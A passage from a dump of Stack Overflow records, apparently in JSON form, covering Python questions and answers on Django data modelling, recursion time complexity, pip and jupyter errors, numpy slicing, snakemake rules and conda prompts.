You'll have some sets (perhaps items, suppliers, etc.), data that form constraints or limits, some variables indexed by the sets, and an objective....likely to minimize cost.\nForget about the complexities of split-orders and combined shipping at first and just see if you can get something working with toy data, then build out from there.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75447819,"CreationDate":"2023-02-14 12:27:00","Q_Score":1,"ViewCount":65,"Question":"I develop an app for creating products in online shop. Let's suppose I have 50 categories of products and each of these has some required parameters for product (like color, size, etc.).\nSome parameters apper in all categories, and some are unique. That gives me around 300 parameters (fields) that should be defined in Django model.\nI suppose it is not good idea to create one big database with 300 fields and add products that have 1-15 parameters there (leaving remaining fields empty). What would be the best way to handle it?\nWhat would be the best way to display form that will ask only for parameters required in given category?","Title":"How to handle 300 parameters in Django Model \/ Form?","Tags":"python,django,e-commerce","AnswerCount":2,"A_Id":75447889,"Answer":"If you have to keep the Model structure as you have defined it here, I would create a \"Product\" \"Category\" \"ProductCategory\" tables.\nProduct table is as follows:\n\n\n\n\nProductID\nProductName\n\n\n\n\n1\nShirt\n\n\n2\nTable\n\n\n3\nVase\n\n\n\n\nCategory table is following\n\n\n\n\nCategoryID\nCategoryName\n\n\n\n\n1\nSize\n\n\n2\nColor\n\n\n3\nMaterial\n\n\n\n\nProductCategory\n\n\n\n\nID\nProductID\nCategoryID\nCategoryValue\n\n\n\n\n1\n1 (Shirt)\n1 (Size)\nMedium\n\n\n2\n2 (Table)\n2 (Color)\nDark Oak\n\n\n3\n3 (Vase)\n3 (Material)\nGlass\n\n\n3\n3 (Vase)\n3 (Material)\nPlastic\n\n\n\n\nThis would be the easiest way, which wouldn't create 300 columns, would allow you to reuse categories across 
different types of products, but in the case of many products, would start to slowdown the database queries, as you would be joining 2 big tables. Product and ProductCategory\nYou could split it up in more major Categories such as \"Plants\", \"Kitchenware\" etc etc.","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75448841,"CreationDate":"2023-02-14 13:54:23","Q_Score":2,"ViewCount":85,"Question":"What is the worst case time complexity (Big O notation) of the following function for positive integers?\ndef rec_mul(a:int, b:int) -> int:\n if b == 1:\n return a\n \n if a == 1:\n return b\n \n else:\n return a + rec_mul(a, b-1)\n\nI think it's O(n) but my friend claims it's O(2^n)\nMy argument:\nThe function recurs at any case b times, therefor the complexity is O(b) = O(n)\nHis argument:\nsince there are n bits, a\\b value can be no more than (2^n)-1,\ntherefor the max number of calls will be O(2^n)","Title":"Time complexity of recursion of multiplication","Tags":"python,recursion,time-complexity,big-o","AnswerCount":3,"A_Id":75449860,"Answer":"Background\nA unary encoding of the input uses an alphabet of size 1: think tally marks. If the input is the number a, you need O(a) bits.\nA binary encoding uses an alphabet of size 2: you get 0s and 1s. If the number is a, you need O(log_2 a) bits.\nA trinary encoding uses an alphabet of size 3: you get 0s, 1s, and 2s. If the number is a, you need O(log_3 a) bits.\nIn general, a k-ary encoding uses an alphabet of size k: you get 0s, 1s, 2s, ..., and k-1s. If the number is a, you need O(log_k a) bits.\nWhat does this have to do with complexity?\nAs you are aware, we ignore multiplicative constants inside big-oh notation. n, 2n, 3n, etc, are all O(n).\nThe same holds for logarithms. log_2 n, 2 log_2 n, 3 log_2 n, etc, are all O(log_2 n).\nThe key observation here is that the ratio log_k1 n \/ log_k2 n is a constant, no matter what k1 and k2 are... as long as they are greater than 1. 
That means f(log_k1 n) = O(log_k2 n) for all k1, k2 > 1.\nThis is important when comparing algorithms. As long as you use an \"efficient\" encoding (i.e., not a unary encoding), it doesn't matter what base you use: you can simply say f(n) = O(lg n) without specifying the base. This allows us to compare the runtimes of algorithms without worrying about the exact encoding you use.\nSo n = b (which implies a unary encoding) is typically never used. Binary encoding is simplest, and doesn't provide a non-constant speed-up over any other encoding, so we usually just assume binary encoding.\nThat means we almost always assume that n = lg a + lg b is the input size, not n = a + b. A unary encoding is the only one that suggests linear growth, rather than exponential growth, as the values of a and b increase.\n\nOne area, though, where unary encodings are used is in distinguishing between strong NP-completeness and weak NP-completeness. Without getting into the theory, if a problem is NP-complete, we don't expect any algorithm to have a polynomial running time, that is, one bounded by O(n**k) for some constant k when using an efficient encoding.\nBut some algorithms do become polynomial if we allow a unary encoding. If a problem that is otherwise NP-complete becomes polynomial when using a unary encoding, we call that a weakly NP-complete problem. 
It's still slow, but it is in some sense \"faster\" than an algorithm where the size of the numbers doesn't matter.","Users Score":1,"is_accepted":false,"Score":0.0665680765,"Available Count":3},{"Q_Id":75448841,"CreationDate":"2023-02-14 13:54:23","Q_Score":2,"ViewCount":85,"Question":"What is the worst case time complexity (Big O notation) of the following function for positive integers?\ndef rec_mul(a:int, b:int) -> int:\n if b == 1:\n return a\n \n if a == 1:\n return b\n \n else:\n return a + rec_mul(a, b-1)\n\nI think it's O(n) but my friend claims it's O(2^n)\nMy argument:\nThe function recurs at any case b times, therefor the complexity is O(b) = O(n)\nHis argument:\nsince there are n bits, a\\b value can be no more than (2^n)-1,\ntherefor the max number of calls will be O(2^n)","Title":"Time complexity of recursion of multiplication","Tags":"python,recursion,time-complexity,big-o","AnswerCount":3,"A_Id":75449172,"Answer":"Your friend and you can both be right, depending on what is n. Another way to say this is that your friend and you are both wrong, since you both forgot to specify what was n.\nYour function takes an input that consists in two variables, a and b. These variables are numbers. If we express the complexity as a function of these numbers, it is really O(b log(ab)), because it consists in b iterations, and each iteration requires an addition of numbers of size up to ab, which takes log(ab) operations.\nNow, you both chose to express the complexity in function of n rather than a or b. This is okay; we often do this; but an important question is: what is n?\nSometimes we think it's \"obvious\" what is n, so we forget to say it.\n\nIf you choose n = max(a, b) or n = a + b, then you are right, the complexity is O(n).\nIf you choose n to be the length of the input, then n is the number of bits needed to represent the two numbers a and b. In other words, n = log(a) + log(b). 
In that case, your friend is right, the complexity is O(2^n).\n\nSince there is an ambiguity in the meaning of n, I would argue that it's meaningless to express the complexity as a function of n without specifying what n is. So, your friend and you are both wrong.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":3},{"Q_Id":75448841,"CreationDate":"2023-02-14 13:54:23","Q_Score":2,"ViewCount":85,"Question":"What is the worst case time complexity (Big O notation) of the following function for positive integers?\ndef rec_mul(a:int, b:int) -> int:\n if b == 1:\n return a\n \n if a == 1:\n return b\n \n else:\n return a + rec_mul(a, b-1)\n\nI think it's O(n) but my friend claims it's O(2^n)\nMy argument:\nThe function recurs at any case b times, therefor the complexity is O(b) = O(n)\nHis argument:\nsince there are n bits, a\\b value can be no more than (2^n)-1,\ntherefor the max number of calls will be O(2^n)","Title":"Time complexity of recursion of multiplication","Tags":"python,recursion,time-complexity,big-o","AnswerCount":3,"A_Id":75449149,"Answer":"You are both right.\nIf we disregard the time complexity of addition (and you might discuss whether you have reason to do so or not) and count only the number of iterations, then you are both right because you define:\nn = b\nand your friend defines\nn = log_2(b)\nso the complexity is O(b) = O(2^log_2(b)).\nBoth definitions are valid and both can be practical. 
You look at the input values, your friend at the lengths of the input, in bits.\nThis is a good demonstration why big-O expressions mean nothing if you don't define the variables used in those expressions.","Users Score":2,"is_accepted":false,"Score":0.1325487884,"Available Count":3},{"Q_Id":75449511,"CreationDate":"2023-02-14 14:47:36","Q_Score":1,"ViewCount":1250,"Question":"I recently came across this error while using \"pip install\" with python version 3.10 and pip version 22.3.1:\nERROR: Exception:\nTraceback (most recent call last):\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\site-packages\\pip\\_internal\\cli\\base_command.py\", line 160, in exc_logging_wrapper\n status = run_func(*args)\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\site-packages\\pip\\_internal\\cli\\req_command.py\", line 247, in wrapper\n return func(self, options, args)\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\site-packages\\pip\\_internal\\commands\\download.py\", line 103, in run\n build_tracker = self.enter_context(get_build_tracker())\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\site-packages\\pip\\_internal\\cli\\command_context.py\", line 27, in enter_context\n return self._main_context.enter_context(context_provider)\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\contextlib.py\", line 492, in enter_context\n result = _cm_type.__enter__(cm)\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\contextlib.py\", line 135, in __enter__\n return next(self.gen)\n File \"C:\\Program 
Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\site-packages\\pip\\_internal\\operations\\build\\build_tracker.py\", line 46, in get_build_tracker\n root = ctx.enter_context(TempDirectory(kind=\"build-tracker\")).path\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\site-packages\\pip\\_internal\\utils\\temp_dir.py\", line 125, in __init__\n path = self._create(kind)\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\site-packages\\pip\\_internal\\utils\\temp_dir.py\", line 164, in _create\n path = os.path.realpath(tempfile.mkdtemp(prefix=f\"pip-{kind}-\"))\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\tempfile.py\", line 357, in mkdtemp\n prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\tempfile.py\", line 126, in _sanitize_params\n dir = gettempdir()\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\tempfile.py\", line 299, in gettempdir\n return _os.fsdecode(_gettempdir())\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\tempfile.py\", line 292, in _gettempdir\n tempdir = _get_default_tempdir()\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\tempfile.py\", line 223, in _get_default_tempdir\n raise FileNotFoundError(_errno.ENOENT,\nFileNotFoundError: [Errno 2] No usable temporary directory found in ['C:\\\\Users\\\\leon\\\\AppData\\\\Local\\\\Temp', 'C:\\\\Users\\\\leon\\\\AppData\\\\Local\\\\Temp', 'C:\\\\Users\\\\leon\\\\AppData\\\\Local\\\\Temp', 'C:\\\\windows\\\\Temp', 'c:\\\\temp', 
'c:\\\\tmp', '\\\\temp', '\\\\tmp', 'C:\\\\Users\\\\leon']\nWARNING: There was an error checking the latest version of pip.\n\nBefore that there was an access error with the console history which I had been able to solve, but no matter what I try this error always comes up. I also tried reinstalling Python 3.10 and I also tried it with Python 3.11 but it's always this error when using pip install. There also was this weird error in PyCharm where it couldn't set up the virtual env but this is also fixed already.\nThanks in advance.","Title":"Error with pip version 22.3.1 and Python version 3.10","Tags":"python,python-3.x,pip","AnswerCount":1,"A_Id":75449728,"Answer":"If you read the code for tempfile.py shown in the trace, and particularly the _get_default_tempdir() implementation, you will see that the code does the following:\n\nGet the list of all possible temp directory locations (e.g., this list is shown in the actual Exception)\nIterate the list it got\nTry to write a small random file into a given directory\nIf that works, return the directory name to be used as the temporary path.\nIf not, continue iterating the rest of the list from step 2.\nIf the list gets iterated to the end, you will get the exception you are now seeing.\n\nSo, essentially, your pip install will try to write to a bunch of different temporary locations, but each one of those fails.\nThe most likely causes: your user does not have write access to any of those locations, your filesystem is full, some AV tool blocks writes to these locations, or some other reason.\nDo check these directories:\n\nC:\\Users\\leon\\AppData\\Local\\Temp\nC:\\Users\\leon\\AppData\\Local\\Temp\nC:\\Users\\leon\\AppData\\Local\\Temp\nC:\\windows\\Temp\nc:\\temp\nc:\\tmp\nC:\\Users\\leon\n\nOR before you run pip, set the TMP and TEMP environment variables to point to a location you can write to.","Users Score":2,"is_accepted":false,"Score":0.3799489623,"Available Count":1},{"Q_Id":75449803,"CreationDate":"2023-02-14 
15:11:21","Q_Score":1,"ViewCount":74,"Question":"Is there a way to get the exact date\/time from the web rather than taking the PC date\/time?\nI am creating a website where the answer is time relevant. But I don't want someone cheating by putting their PC clock back. When I do:\ntoday = datetime.datetime.today()\n\nor\nnow = datetime.datetime.utcnow().replace(tzinfo=utc)\n\nI still get whatever time my PC is set to.\nIs there a way to get the correct date\/time?","Title":"Django Correct Date \/ Time not PC date\/time","Tags":"python,django,python-datetime","AnswerCount":1,"A_Id":75452728,"Answer":"datetime.today() takes its time information from the server your application is running on. If you currently run your application with python manage.py runserver localhost:8000, the server is your local PC. In this scenario, you can tamper with the time setting of your PC and see different results.\nBut in a production environment, your hosting server will provide the time information. Unless you have a security issue, no unauthorized user should be able to change that.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75450060,"CreationDate":"2023-02-14 15:34:27","Q_Score":1,"ViewCount":50,"Question":"I sometimes use jupyter console to try out things in Python.\nI'm running Arch Linux and installed everything through the Arch repos.\nI hadn't run jupyter console in quite some time, but while trying to launch it, I can't get it to work anymore.\nHere is the error:\nJupyter console 6.5.1\n\nPython 3.10.9 (main, Dec 19 2022, 17:35:49) [GCC 12.2.0]\nType 'copyright', 'credits' or 'license' for more information\nIPython 8.10.0 -- An enhanced Interactive Python. Type '?' 
for help.\n\nIn [1]: \nTask exception was never retrieved\nfuture: exception=TypeError(\"object int can't be used in 'await' expression\")>\nTraceback (most recent call last):\n File \"\/usr\/lib\/python3.10\/site-packages\/jupyter_console\/ptshell.py\", line 842, in handle_external_iopub\n poll_result = await self.client.iopub_channel.socket.poll(500)\nTypeError: object int can't be used in 'await' expression\nShutting down kernel\n\nI tried reinstalling everything through pacman in case I accidentally changed something I shouldn't, but it changed nothing.\nAny tips on what could be wrong ?","Title":"jupyter console doesn't work on my computer anymore","Tags":"python,archlinux,jupyter-console","AnswerCount":1,"A_Id":75456724,"Answer":"I don't have enough rep to comment but I do not have the same issue. I can launch Jupyter QT Console just fine, and I have the same python version and IPython version. Just thought I would share, even though I don't use Jupyter Console. I do all my .ipynb in vscode and all other coding in neovim. 
I don't know if there is a difference between the console you are talking about and QT console, but Jupyter QT Console works fine for me, just unbearably light theme :).","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75453995,"CreationDate":"2023-02-14 22:55:53","Q_Score":9,"ViewCount":7767,"Question":"It was working perfectly earlier but for some reason now I am getting strange errors.\npandas version: 1.2.3\nmatplotlib version: 3.7.0\nsample dataframe:\ndf\n cap Date\n0 1 2022-01-04\n1 2 2022-01-06\n2 3 2022-01-07\n3 4 2022-01-08\n\ndf.plot(x='cap', y='Date')\nplt.show()\n\ndf.dtypes\ncap int64\nDate datetime64[ns]\ndtype: object\n\nI get a traceback:\nTraceback (most recent call last):\n File \"\/Library\/Developer\/CommandLineTools\/Library\/Frameworks\/Python3.framework\/Versions\/3.8\/lib\/python3.8\/code.py\", line 90, in runcode\n exec(code, self.locals)\n File \"\", line 1, in \n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/pandas\/plotting\/_core.py\", line 955, in __call__\n return plot_backend.plot(data, kind=kind, **kwargs)\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/pandas\/plotting\/_matplotlib\/__init__.py\", line 61, in plot\n plot_obj.generate()\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/pandas\/plotting\/_matplotlib\/core.py\", line 279, in generate\n self._setup_subplots()\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/pandas\/plotting\/_matplotlib\/core.py\", line 337, in _setup_subplots\n fig = self.plt.figure(figsize=self.figsize)\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/matplotlib\/_api\/deprecation.py\", line 454, in wrapper\n return func(*args, **kwargs)\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/matplotlib\/pyplot.py\", line 813, in figure\n manager = new_figure_manager(\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/matplotlib\/pyplot.py\", line 382, in 
new_figure_manager\n _warn_if_gui_out_of_main_thread()\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/matplotlib\/pyplot.py\", line 360, in _warn_if_gui_out_of_main_thread\n if _get_required_interactive_framework(_get_backend_mod()):\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/matplotlib\/pyplot.py\", line 208, in _get_backend_mod\n switch_backend(rcParams._get(\"backend\"))\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/matplotlib\/pyplot.py\", line 331, in switch_backend\n manager_pyplot_show = vars(manager_class).get(\"pyplot_show\")\nTypeError: vars() argument must have __dict__ attribute","Title":"Pandas plot, vars() argument must have __dict__ attribute?","Tags":"python,pandas,matplotlib","AnswerCount":2,"A_Id":75657421,"Answer":"The solution by NEStenerus did not work for me, because I don't have tkinter installed and did not want to change my package configuration.\nAlternative Fix\nInstead, you can disable the \"show plots in tool window\" option, by going to\nSettings | Tools | Python Scientific | Show plots in tool window and unchecking it.","Users Score":4,"is_accepted":false,"Score":0.3799489623,"Available Count":1},{"Q_Id":75454498,"CreationDate":"2023-02-15 00:30:10","Q_Score":1,"ViewCount":28,"Question":"I have an n x n dimensional numpy array of eigenvectors as columns, and want to return the last v of them as another array. However, they are currently in ascending order, and I wish to return them in descending order.\nCurrently, I'm attempting to index as follows\neigenvector_array[:,-1:-v]\n\nBut this doesn't seem to be working. Is there a more efficient way to do this?","Title":"Reverse Index through a numPy ndarray","Tags":"python,numpy,indexing","AnswerCount":2,"A_Id":75454533,"Answer":"Let's rewrite this to make it a little less confusing.\neigenvector_array[:,-1:-v]\nto:\neigenvector_array[:][-1:-v]\nNow remember how slicing works in Python:\n[start:stop:step]\nIf you set step
to -1 it will return them in reverse, so:\neigenvector_array[:,-1:-v:-1] should be your answer.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75457859,"CreationDate":"2023-02-15 09:37:32","Q_Score":2,"ViewCount":42,"Question":"I am building a snakemake pipeline, and in the final rule I have existing files that I want the Snakefile to append to.\nHere is the rule:\nrule Amend: \n input:\n Genome_stats = expand(\"global_temp_workspace\/result\/{sample}.Genome.stats.tsv\", sample= sampleID),\n GenomeSNV = expand(\"global_temp_workspace\/result\/{sample}.Genome.SNVs.tsv\", sample= sampleID),\n GenomesConsensus = expand(\"global_temp_workspace\/analysis\/{sample}.renamed.consensus.fasta\", sample= sampleID),\n output: \n Genome_stats=\"global_temp_workspace\/result\/Genome.stats.tsv\",\n GenomeSNV=\"global_temp_workspace\/result\/Genome.SNVs.tsv\",\n GenomesConsensus=\"global_temp_workspace\/result\/Genomes.consensus.fasta\"\n threads: workflow.cores\n shell: \n \"\"\"\n cat {input.Genome_stats} | tail -n +2 >> {output.Genome_stats} ;\\ \n cat {input.GenomesConsensus} >> {output.GenomesConsensus} ;\\ \n cat {input.GenomeSNV} | tail -n +2 >> {output.GenomeSNV} ;\\ \n \"\"\"\n\nHow can I solve it?\nThank you\nI tried dynamic() in the output and adding touch {output.Genome_stats} {output.GenomesConsensus} {output.GenomeSNV} at the end of the shell, but it did not work.\nWhenever I run snakemake I get:\n$ time snakemake --snakefile V2.5.smk --cores all \nBuilding DAG of jobs...\nNothing to be done.\nComplete log: .snakemake\/log\/2023-02-15T123050.937009.snakemake.log\n\nreal 0m1.022s\nuser 0m2.744s\nsys 0m2.797s","Title":"How can I make a snakefile rule append the results to the input file of the rule?","Tags":"python,pipeline,snakemake","AnswerCount":1,"A_Id":75460060,"Answer":"This behaviour is not idempotent and is usually a recipe for trouble. 
What happens if the machine breaks down or the process is killed during the write stage? What happens if a rule is accidentally run twice?\nAs advised by @Cornelius Roemer in the comment to the question, the safer way is to write to a new file. If the overwrite-like behaviour is desired, then the new file can be moved to the original file location, but some record\/checkpoint file should be created to make sure that Snakemake knows not to re-process the file.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75459812,"CreationDate":"2023-02-15 12:29:13","Q_Score":1,"ViewCount":84,"Question":"I am developing Python projects under git control, using poetry to manage my venvs.\nFrom my project's directory I issue a \"poetry shell\" command and my new shell command prompt becomes something like:\n(isagog-ai-py3.10) (base) bob@Roberts-Mac-mini isagog-ai %\n\nwhere the first part in brackets gives me the name of the project and the Python version I'm using, and the last part of the prompt is my current directory name.\nBut what is it that gives me the \"(base)\" part? I'm actually working on a \"dev\" branch.","Title":"Poetry shell command prompt: what gives the (base) part?","Tags":"git,shell,python-venv,python-poetry","AnswerCount":1,"A_Id":75463086,"Answer":"This is the base environment from conda. Conda activates its base environment by default in every new shell, which is why the prefix appears; it has nothing to do with your git branch. You can turn this off with conda config --set auto_activate_base false.","Users Score":2,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75462208,"CreationDate":"2023-02-15 15:46:09","Q_Score":1,"ViewCount":67,"Question":"I am trying to split my Django settings into production and development. The biggest question that I have is how to use two different databases for the two environments? 
How to deal with migrations?\nI tried changing the settings for the development server to use a new empty database, however, I can not apply the migrations to create the tables that I already have in the production database.\nAll the guides on multiple databases focus on the aspect of having different types of data in different databases (such as users database, etc.) but not the way I am looking for.\nCould you offer some insights about what the best practices are and how to manage the two databases also in terms of migrations?\nEDIT:\nHere is what I get when I try to run python manage.py migrate on the new database:\nTraceback (most recent call last):\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/backends\/utils.py\", line 85, in _execute\n return self.cursor.execute(sql, params)\npsycopg2.errors.UndefinedTable: relation \"dashboard_posttags\" does not exist\nLINE 1: ...ags\".\"tag\", \"dashboard_posttags\".\"hex_color\" FROM \"dashboard...\n ^\n\n\nThe above exception was the direct cause of the following exception:\n\nTraceback (most recent call last):\n File \"\/......\/manage.py\", line 22, in \n main()\n File \"\/......\/manage.py\", line 18, in main\n execute_from_command_line(sys.argv)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/management\/__init__.py\", line 425, in execute_from_command_line\n utility.execute()\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/management\/__init__.py\", line 419, in execute\n self.fetch_command(subcommand).run_from_argv(self.argv)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/management\/base.py\", line 373, in run_from_argv\n self.execute(*args, **cmd_options)\n File 
\"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/management\/base.py\", line 417, in execute\n output = self.handle(*args, **options)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/management\/base.py\", line 90, in wrapped\n res = handle_func(*args, **kwargs)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/management\/commands\/migrate.py\", line 75, in handle\n self.check(databases=[database])\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/management\/base.py\", line 438, in check\n all_issues = checks.run_checks(\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/checks\/registry.py\", line 77, in run_checks\n new_errors = check(app_configs=app_configs, databases=databases)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/checks\/urls.py\", line 13, in check_url_config\n return check_resolver(resolver)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/checks\/urls.py\", line 23, in check_resolver\n return check_method()\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/urls\/resolvers.py\", line 446, in check\n for pattern in self.url_patterns:\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/utils\/functional.py\", line 48, in __get__\n res = instance.__dict__[self.name] = self.func(instance)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/urls\/resolvers.py\", line 632, in url_patterns\n patterns = getattr(self.urlconf_module, \"urlpatterns\", self.urlconf_module)\n File 
\"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/utils\/functional.py\", line 48, in __get__\n res = instance.__dict__[self.name] = self.func(instance)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/urls\/resolvers.py\", line 625, in urlconf_module\n return import_module(self.urlconf_name)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/importlib\/__init__.py\", line 127, in import_module\n return _bootstrap._gcd_import(name[level:], package, level)\n File \"\", line 1030, in _gcd_import\n File \"\", line 1007, in _find_and_load\n File \"\", line 986, in _find_and_load_unlocked\n File \"\", line 680, in _load_unlocked\n File \"\", line 850, in exec_module\n File \"\", line 228, in _call_with_frames_removed\n File \"\/......\/app\/urls.py\", line 11, in \n from main_platform.views.investor import AccountView, profile, app_home_redirect\n File \"\/......\/main_platform\/views\/investor.py\", line 118, in \n class PostFilter(django_filters.FilterSet):\n File \"\/......\/main_platform\/views\/investor.py\", line 124, in PostFilter\n for tag in PostTags.objects.all():\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/models\/query.py\", line 280, in __iter__\n self._fetch_all()\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/auto_prefetch\/__init__.py\", line 98, in _fetch_all\n super()._fetch_all()\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/models\/query.py\", line 1354, in _fetch_all\n self._result_cache = list(self._iterable_class(self))\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/models\/query.py\", line 51, in __iter__\n results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, 
chunk_size=self.chunk_size)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/models\/sql\/compiler.py\", line 1202, in execute_sql\n cursor.execute(sql, params)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/backends\/utils.py\", line 99, in execute\n return super().execute(sql, params)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/sentry_sdk\/integrations\/django\/__init__.py\", line 563, in execute\n return real_execute(self, sql, params)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/backends\/utils.py\", line 67, in execute\n return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/backends\/utils.py\", line 76, in _execute_with_wrappers\n return executor(sql, params, many, context)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/backends\/utils.py\", line 85, in _execute\n return self.cursor.execute(sql, params)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/utils.py\", line 90, in __exit__\n raise dj_exc_value.with_traceback(traceback) from exc_value\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/backends\/utils.py\", line 85, in _execute\n return self.cursor.execute(sql, params)\ndjango.db.utils.ProgrammingError: relation \"dashboard_posttags\" does not exist\nLINE 1: ...ags\".\"tag\", \"dashboard_posttags\".\"hex_color\" FROM \"dashboard...","Title":"Separate databases for development and production in Djang","Tags":"python,django,postgresql","AnswerCount":2,"A_Id":75463997,"Answer":"If you have a new empty 
